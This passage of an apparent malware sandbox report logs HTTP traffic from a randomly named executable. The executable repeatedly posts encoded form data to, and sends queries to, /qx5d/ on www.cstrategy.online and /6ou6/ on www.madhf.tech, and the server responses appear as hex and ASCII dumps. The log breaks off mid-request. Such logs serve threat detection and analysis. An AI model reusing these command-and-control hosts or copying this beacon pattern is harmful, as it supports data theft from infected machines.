                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:43:36.637901068 CET1236INHTTP/1.1 404 Not Found
                                                                              Connection: close
                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                              pragma: no-cache
                                                                              content-type: text/html
                                                                              content-length: 1251
                                                                              date: Mon, 02 Dec 2024 13:43:36 GMT
                                                                              server: LiteSpeed
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                              Dec 2, 2024 14:43:36.637945890 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                              Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049860194.76.119.60806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:43:53.496704102 CET628OUTPOST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 54 30 70 54 43 30 55 73 6b 57 55 46 6d 37 37 35 74 32 31 4c 55 47 46 57 30 39 31
                                                                              Data Ascii: 6NVpdLF=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYT0pTC0UskWUFm775t21LUGFW091
                                                                              Dec 2, 2024 14:43:54.896246910 CET391INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049866194.76.119.60806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:43:56.163120985 CET652OUTPOST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 61 4c 59 79 49 66 6a 35 6f 6b 44 66 4d 71 71 35 69 57 2f 67 69 44 49 6d 78 2b 72 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjaLYyIfj5okDfMqq5iW/giDImx+rg==
                                                                              Dec 2, 2024 14:43:57.561367035 CET391INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049872194.76.119.60806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:43:58.833781004 CET1665OUTPOST /qx5d/ HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.cstrategy.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.cstrategy.online/qx5d/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 47 55 4c 51 7a 77 77 4e 48 49 4c 6a 43 32 66 78 6b 35 77 4f 6b 79 44 64 39 69 6c 35 32 74 70 6a 7a 70 4d 6b 63 69 77 57 37 6c 44 73 46 6b 6a 31 79 31 6f 49 32 38 59 31 79 64 68 55 73 39 5a 67 46 5a 35 72 38 61 30 32 6a 71 71 36 37 33 50 6a 67 79 57 4f 61 76 61 45 72 77 33 6d 61 4d 35 44 46 4a 45 64 74 33 6c 62 6d 76 77 71 4b 2b 34 48 4f 54 53 6c 4a 2b 4b 48 2f 56 49 35 39 62 75 56 79 54 6b 64 78 62 68 63 50 48 62 2b 66 34 2b 45 57 54 2b 4a 31 5a 4d 6c 78 55 6a 54 4e 5a 76 52 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUGULQzwwNHILjC2fxk5wOkyDd9il52tpjzpMkciwW7lDsFkj1y1oI28Y1ydhUs9ZgFZ5r8a02jqq673PjgyWOavaErw3maM5DFJEdt3lbmvwqK+4HOTSlJ+KH/VI59buVyTkdxbhcPHb+f4+EWT+J1ZMlxUjTNZvRnvV/nuvdH5iGgtTelP0OAq8muiqft5naxElSRZGlV681jST4M4XyUSJF+iVYRWH8vNilOpB5EUB66BhppX5BX47hfatteNQa49hnBb53nbIJLGs1jpdOa2O6M/I5Ym/VEbO4uR4mSFwy6pFG/5XbRzxYnQR2IbSoc6t2RH5OJMIy4dmC1cpLaEqSzwgSXc2GC0ouvPEucfvfkiByxMX/o1OX6u6PEuopS2YHt2DAlAVqKdgM4hXRAQe0pIbn02E+6O7q8fnCVjYsRWgm2LnJXoXIPuwfxRQFRuchasttOCcaXW0EehD0+2ADo4x8qXzdAtpMu7wAXRput0SrEmDu3FaLBzXfyuy5SdPXNVZY0EhY95cbF4E6BzCZdGBl/Sv8P20WDY8H/jztISQJEE5kEnvHxg8+sTX/sOaqCNoILFFYRl76o4b+1qLA/Be97VCUWB//V5+9vrpdRenA6lu0qcgz7VDTSL1qklr8EJoyamyme0KKxpkHiTTldIQgsVPIHomZ9/wca3ZwjmzpR9mUxn6DCYj9Zut8CvbQ7/75f88GteNCcl1VkjSP5cy4l0MBNKF9Ip2tQRtUAJmCtnmphWScg0NnyptSv5XdkaopqjunQ75ytFwC5CYYehLlGDx4Cw+6HgBF4/uhfmJL/mXyItELfdBL4Jvp+U [TRUNCATED]
                                                                              Dec 2, 2024 14:44:00.196142912 CET391INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:43:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049879194.76.119.60806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:01.490506887 CET359OUTGET /qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.cstrategy.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:44:02.857950926 CET531INHTTP/1.1 301 Moved Permanently
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Mon, 02 Dec 2024 13:44:02 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 178
                                                                              Connection: close
                                                                              Location: https://www.cstrategy.online/qx5d/?6NVpdLF=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPppPRQa5ZmY++m+47QgCR+/iVNw4gjA==&_jVx=rlV0_TQ81
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049896103.224.182.242806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:09.216964006 CET610OUTPOST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 53 67 73 4e 37 68 61 44 44 47 5a 73 6d 79 42 49 50 6c 47 49 46 32 70 36 45 34 64 34
                                                                              Data Ascii: 6NVpdLF=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSgsN7haDDGZsmyBIPlGIF2p6E4d4
                                                                              Dec 2, 2024 14:44:10.494709015 CET871INHTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:10 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147050.6544345; expires=Thu, 30-Nov-2034 13:44:10 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.1049902103.224.182.242806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:11.880659103 CET634OUTPOST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.madhf.tech/6ou6/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 31 30 4b 2b 6f 53 36 62 64 37 6b 46 71 36 53 63 69 45 50 65 39 2f 4f 36 6b 69 36 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB10K+oS6bd7kFq6SciEPe9/O6ki6g==
                                                                              Dec 2, 2024 14:44:13.149802923 CET871INHTTP/1.1 200 OK
                                                                              date: Mon, 02 Dec 2024 13:44:12 GMT
                                                                              server: Apache
                                                                              set-cookie: __tad=1733147052.6846258; expires=Thu, 30-Nov-2034 13:44:12 GMT; Max-Age=315360000
                                                                              vary: Accept-Encoding
                                                                              content-encoding: gzip
                                                                              content-length: 576
                                                                              content-type: text/html; charset=UTF-8
                                                                              connection: close
                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                                              Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.1049909103.224.182.242806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:44:14.536616087 CET1647OUTPOST /6ou6/ HTTP/1.1
                                                                              Host: www.madhf.tech
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.madhf.tech
                                                                              Content-Length: 1232
